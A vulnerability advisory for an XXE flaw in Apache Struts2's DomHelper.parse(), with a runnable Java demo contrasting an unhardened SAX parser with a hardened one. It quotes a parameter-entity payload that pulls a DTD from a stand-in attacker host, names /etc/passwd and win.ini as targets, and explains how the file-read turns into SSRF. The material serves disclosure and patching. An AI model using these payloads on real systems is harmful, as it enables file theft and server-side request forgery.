CVE-2025-68493: Apache Struts2 XWork-Core XXE
Technical Breakdown: Our AI agent, ZAST.AI, uncovered an XXE flaw in com.opensymphony.xwork2.util.DomHelper.parse(). The root cause is a raw SAXParserFactory initialization that never sets the security features which disable DTD and external-entity processing, for example: factory.setFeature("http://xml.org/sax/features/external-general-entities", false); // MISSING
Attack Vector: An attacker who controls the XML reaching the InputSource can supply a DOCTYPE that declares a malicious external entity, and the parser resolves it.
- Payload: <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd"> (a parameter entity that pulls an attacker-hosted DTD, the out-of-band variant; an inline general entity with a file:// SYSTEM identifier works the same way for direct disclosure)
- Result: local file disclosure (e.g., /etc/passwd, win.ini) and SSRF, because the parser fetches whatever URL the entity names.
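The following is an added, stand-alone illustration and not Struts or XWork code: `vulnerableFactory()` is a simplified model of the unhardened SAXParserFactory pattern described above (the real DomHelper.parse() has more plumbing), `hardenedFactory()` shows the features a fix should set, and the XXE document, the temporary "secret" file it reads, and the element names are all constructed for the demo. The hardened variant rejects the DOCTYPE outright, so it also blocks the parameter-entity payload quoted above.

```java
import java.io.StringReader;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class XxeDemo {

    // Assumed simplified model of the vulnerable pattern: a raw factory with
    // no security features set, so DTDs and external entities are honoured.
    static SAXParserFactory vulnerableFactory() {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        factory.setNamespaceAware(true);
        return factory;
    }

    // Hardened factory: forbid DOCTYPE entirely, and additionally disable
    // external entities and external DTD loading in case a caller ever
    // re-enables doctypes for a legitimate reason.
    static SAXParserFactory hardenedFactory() throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        factory.setNamespaceAware(true);
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        return factory;
    }

    // Parse with the given factory and collect all character data, so the
    // caller can see whether an entity was expanded into the document.
    static String parseText(SAXParserFactory factory, String xml) throws Exception {
        SAXParser parser = factory.newSAXParser();
        StringBuilder text = new StringBuilder();
        parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler() {
            @Override
            public void characters(char[] ch, int start, int length) {
                text.append(ch, start, length);
            }
        });
        return text.toString();
    }

    public static void main(String[] args) throws Exception {
        // Constructed stand-in for /etc/passwd or win.ini, created in a temp dir
        // so the demo runs offline and touches nothing sensitive.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.writeString(secret, "root:x:0:0:root:/root:/bin/bash");

        // Constructed XXE payload: a general entity whose SYSTEM identifier
        // points at a local file; the parser inlines the file where &xxe; appears.
        String payload = "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE struts [\n"
            + "  <!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">\n"
            + "]>\n"
            + "<struts><package>&xxe;</package></struts>";

        try {
            // Unhardened parser: the file contents come back as element text.
            System.out.println("vulnerable: " + parseText(vulnerableFactory(), payload));

            // Hardened parser: the DOCTYPE itself is refused before any entity is touched.
            try {
                parseText(hardenedFactory(), payload);
                System.out.println("hardened: unexpectedly parsed the document");
            } catch (SAXException e) {
                System.out.println("hardened: rejected (" + e.getMessage() + ")");
            }
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Run with `javac XxeDemo.java && java XxeDemo`. The first line prints the temp file's contents, which is exactly the disclosure path the advisory describes; the second reports a SAXParseException because `disallow-doctype-decl` refuses the DOCTYPE. Swap the `file:` SYSTEM identifier for an `http://` URL and the same unhardened factory becomes the SSRF primitive.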
Status: Assigned CVE-2025-68493.
Affects Struts2 <= 6.0.3. Patching is critical.
🔗 Vulnerability reports: https://cwiki.apache.org/confluence/display/WW/S2-069

